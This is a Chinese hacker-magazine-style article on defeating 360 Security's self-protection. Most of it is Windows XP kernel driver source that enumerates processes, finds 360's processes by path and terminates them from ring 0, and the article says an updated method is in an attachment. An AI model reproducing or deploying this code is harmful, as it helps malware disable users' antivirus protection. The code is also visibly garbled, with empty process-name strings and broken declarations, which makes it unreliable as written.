2024年3月26日发(作者:)
Ring0突破360自我保护
ConTrail
看了第七期的《AU3干掉360实时保护》,很佩服作者的思路,使用AU3来结束360。文章
写得很精彩,但是美中不足的是没有考虑到360的自我保护,可能是作者写文章的时候360
还没有增加自我保护这个功能。
对于开了自我保护的360来说,无论是通过任务管理器,还是taskkill、ntsd命令都无法结
束其进程。360的自我保护刚出来的时候还是大肆宣传了一番,说是完全可以媲美KV2008,
因此我想开了这个功能的人应该不少吧。
OK,废话不多说,现在我们就来想办法,彻底突破360的自我保护。
看到进程保护,首先想到的就是Hook。记得Flowercode大牛曾经说过,360 安全卫士的自
我保护方法是在 KiSystemService Hook 中过滤了一些函数,比如 ZwOpenProcess,用于阻
止用户态程序结束其进程;对于使用驱动的进程管理类程序则是过滤了
ZwDeviceIoControlFile函数的参数,若发现受到保护的 PID/EPROCESS 则进行干扰。因为
这类程序通常都是使用明文传递DeviceIoControlCode给驱动,被360一干扰,自然不能结
束进程了。
知道了原理,自然就好办了。
第一种是采用密文的方式来传递DeviceIoControlCode,简单一点采用异或加密就可以。但
是这种需要ring3得到PID传给ring0,我更喜欢Do All Things In Ring0。所以采用第二种方
法,标准的PsLookupProcessByProcessId -> KeStackAttachProcess -> ZwTerminateProcess ->
KeUnStackAttachProcess,所有的流程都在驱动中完成,不使用DeviceIoControlCode。废话不
多说,直接上代码。
先摘录一些XPSP2环境中EPROCESS的定义片断和其他的一些数据结构的定义 :
dt _EPROCESS
+0x000 Pcb : _KPROCESS
+0x078 ExitTime : _LARGE_INTEGER
+0x174 ImageFileName : [16] UChar
+0x1f4 SeAuditProcessCreationInfo : _SE_AUDIT_PROCESS_CREATION_INFO
dt _SE_AUDIT_PROCESS_CREATION_INFO
+0x000 ImageFileName : Ptr32 _OBJECT_NAME_INFORMATION
dt _OBJECT_NAME_INFORMATION
+0x000 Name : _UNICODE_STRING
#include
NTSTATUS status;
PEPROCESS eprocess = NULL;
UNICODE_STRING path;
WCHAR path_buffer[256];
WCHAR buffer[256];
int index;
unsigned char* p;
unsigned char* pExtiTime;
KAPC_STATE apcstate;
//申明要使用的API
NTKERNELAPI
NTSTATUS
PsLookupProcessByProcessId (
IN ULONG ProcessId,
OUT PEPROCESS *Process
);
NTKERNELAPI
VOID
KeStackAttachProcess (
IN PRKPROCESS PROCESS,
OUT PRKAPC_STATE ApcState
);
NTKERNELAPI
VOID
KeUnstackDetachProcess (
IN PRKAPC_STATE ApcState
);
NTSTATUS
NTAPI
ZwTerminateProcess(
IN HANDLE ProcessHandle OPTIONAL,
IN NTSTATUS ExitStatus);
void DriverUnload(PDRIVER_OBJECT DriverObject)
{
DbgPrint("Drv unLoading!n");
return ;
}
NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject,
RegistryPath)
{
DbgPrint("Drv Loading!n");
PUNICODE_STRING
DriverObject->DriverUnload = DriverUnload;
RtlInitEmptyUnicodeString(&path,path_buffer,sizeof(path_buffer)); //初始化字符串
for (index = 12; index < 65535; index += 4) //从12开始使用PsLookupProcessByProcessId
//获得EPROCESS,相当于Enum了
//PspCidTable,我们平时用的PspCidTable地
//址也是从这个函数中搜索特征码搜出来的
{
status = PsLookupProcessByProcessId( index,&eprocess );
if (NT_SUCCESS(status)) //PID有效
{
pExtiTime = (unsigned char*)eprocess;
pExtiTime = pExtiTime+0x78; //进程的ExitTime
if ( *pExtiTime == 0 ) //ExitTime等于0表示该进程正在运行
{
p = (unsigned char*)eprocess;
p = p+0x1f4; //SeAuditProcessCreationInfo,2000下没有此项
//不使用偏移0x174的ImageFileName而是使用
// SeAuditProcessCreationInfo是因为ImageFileName长度只有
//16,路径稍微长一点就取不完整
_asm
{
push eax
mov eax,DWORD PTR[p] //OBJECT_NAME_INFORMATION
mov eax,DWORD PTR[eax] //UNICODE_STRING
mov p,eax
pop eax
}
RtlCopyUnicodeString(&path,(PUNICODE_STRING)p); //这句其实可以去掉,
//写上只是为了好调试
RtlCopyMemory(buffer,(unsigned char*)(p+8),mLength); //将文件路
径拷贝出来
if ( wcsstr(buffer,L"") || wcsstr(buffer,L"") ||
wcsstr(buffer,L"") || wcsstr(buffer,L"")) //判断是否为360的进程,是
则杀之o(∩_∩)o...
{
DbgPrint("Find 360!");
DbgPrint("EPROCESS is:%08xn",eprocess);
DbgPrint("%wsn",buffer); //打印路径
KeStackAttachProcess((PRKPROCESS)eprocess,&apcstate);//切换进程空间
status = ZwTerminateProcess(0,0); //结束进程
if (NT_SUCCESS(status))
DbgPrint("ZwTerminateProcess OK!");
KeUnstackDetachProcess(&apcstate);
DbgPrint("Fuck 360!");
}
else
{
}
}
else
{
//DbgPrint("Exited Process!n");
}
}
}
return STATUS_SUCCESS;
}
这份代码是我在5月份的时候写的,可以结束掉2.0版本的360保险箱。因为360保险箱只
支持XPSP2系统,所以驱动中用到的EPROCESS之类的数据结构我都是采用硬编码。但是
今天在写这篇文章的时候才发现360保险箱出了2.2beta版,用我原来这个驱动已经无法结
束了,于是赶紧WinDbg了一阵,发现原来是过滤了ZwTerminateProcess。改了一下代码,
不是KeStackAttachProcess -> ZwTerminateProcess而是直接调用PspTerminateProcess来结束,
果然可以顺利结束。源代码就不占黑防宝贵的版面了,我放在附件里。如果有什么问题,欢
迎大家到黑防论坛里指出。


发布评论